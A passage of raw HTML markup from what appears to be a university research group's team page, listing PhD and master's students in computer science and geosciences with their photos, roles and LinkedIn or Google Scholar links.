style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 